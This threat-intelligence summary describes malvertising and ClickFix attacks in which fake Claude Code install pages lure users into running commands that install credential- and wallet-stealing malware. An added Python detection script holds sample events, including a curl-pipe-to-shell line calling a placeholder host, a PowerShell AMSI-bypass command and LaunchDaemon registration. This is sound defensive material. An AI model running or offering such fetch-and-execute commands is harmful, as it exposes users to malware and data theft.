✅ Report Title: AI-Powered Threats Case Study #06: Malvertising & ClickFix
✅ Executive Summary:
- As AI tools rapidly spread through the workplace, threat actors are running social engineering attacks that exploit the process by which users search for and install AI tools.
- The attack described here uses fake websites that are identical to the Claude Code installation page, promoted through Google Ads, which prompt users to copy specific commands and execute them in the terminal.
📌 Initial Access
- This attack used Malvertising to make the spoofed page appear at the top of search engine results and employed the ClickFix method, which induces users to copy and execute commands themselves.
- Threat actors created a fake website disguised as the Claude Code installation page and lured victims through Google Ads.
- Victims executed the commands from the web page directly, believing it was a legitimate installation process, and were infected with malware as a result.
📌 Windows Malware
- Windows malware is executed through an HTA file disguised as an mp3 file.
- After harvesting browser data, it can download or execute additional payloads according to C2 commands.
📌 macOS Malware
- The macOS malware uses AppleScript to run a bash script that carries out the malicious activity.
- It collects browser information, messenger data, cloud and development credentials, user documents, and cryptocurrency wallet information, then compresses and sends them to C2.
- It was also confirmed that some legitimate cryptocurrency wallet apps were replaced with apps created by threat actors.
✅ Recommended Threat Detection and Mitigation Actions:
- Response should focus on blocking access to spoofing pages, controlling the execution of suspicious commands, and monitoring C2 communications.
- Execution of mshta, powershell, curl, and sh commands supplied by untrusted web pages must be restricted.
- Monitoring is required for PowerShell execution, AMSI bypass attempts, LaunchDaemon registration, creation of concealment directories, and C2 communication.
- If infection is confirmed, the main credentials used on the system must be reissued.
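As an added illustration of the monitoring items above (example code written for this summary, not from the S2W report), a small Python rule set run over constructed process-creation events; the event field layout, the sample command lines and the detection tokens are assumptions:

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str      # endpoint name
    parent: str    # parent process image
    image: str     # process image
    cmdline: str   # full command line as logged


# Constructed sample events (not taken from the report); the hosts, paths and
# placeholder.invalid URLs are made up for this example.
SAMPLE_EVENTS = [
    ProcEvent("win-01", "cmd.exe", "mshta.exe", r"mshta.exe C:\Users\u\Downloads\track.mp3"),
    ProcEvent("win-01", "mshta.exe", "powershell.exe",
              'powershell -nop -w hidden -ep bypass -c "...AmsiUtils..."'),
    ProcEvent("mac-02", "osascript", "bash", "bash -c 'curl -fsSL https://placeholder.invalid/i.sh | sh'"),
    ProcEvent("mac-02", "bash", "mkdir", "mkdir -p /Users/u/Library/.cache-update"),
    ProcEvent("mac-02", "bash", "launchctl", "launchctl load /Library/LaunchDaemons/com.placeholder.update.plist"),
    ProcEvent("win-03", "explorer.exe", "mshta.exe", r"mshta.exe C:\Tools\installer.hta"),  # benign-looking
    ProcEvent("mac-04", "Terminal", "curl", "curl -O https://example.invalid/file.tar.gz"),  # no pipe to sh
]

# Each rule maps one monitoring item from the recommendations to a predicate.
# Token choices (e.g. the AMSI-related strings) are assumptions, not report IoCs.
RULES = [
    # HTA host launched with a file that does not carry an .hta extension (e.g. a fake .mp3)
    ("mshta_nonhta_ext", lambda e: e.image.lower() == "mshta.exe" and not re.search(r"\.hta\b", e.cmdline, re.I)),
    ("powershell_amsi_bypass", lambda e: e.image.lower().startswith("powershell")
     and re.search(r"amsiutils|amsiinitfailed|amsiscanbuffer", e.cmdline, re.I) is not None),
    # remote script piped straight into a shell, as a ClickFix one-liner would do
    ("curl_pipe_shell", lambda e: re.search(r"curl[^|]*\|\s*(ba)?sh\b", e.cmdline) is not None),
    ("launchdaemon_registration", lambda e: "launchctl" in e.image and "/LaunchDaemons/" in e.cmdline),
    # creation of a dot-prefixed (hidden) directory used for concealment
    ("hidden_dir_creation", lambda e: re.search(r"mkdir\s+(-p\s+)?\S*/\.[^/\s]+", e.cmdline) is not None),
    # shell spawned by AppleScript, matching the macOS execution chain described above
    ("shell_from_applescript", lambda e: e.parent == "osascript" and e.image in ("bash", "sh", "zsh")),
]


def detect(events):
    """Return (host, rule_name) pairs for every event matching a rule."""
    hits = []
    for e in events:
        for name, rule in RULES:
            if rule(e):
                hits.append((e.host, name))
    return hits


if __name__ == "__main__":
    for host, rule in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```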
🧑💻 Author: S2W TALON
👉 Contact us: https://s2w.inc/en/contact
*The full report is available upon request or with a subscription to the S2W platform.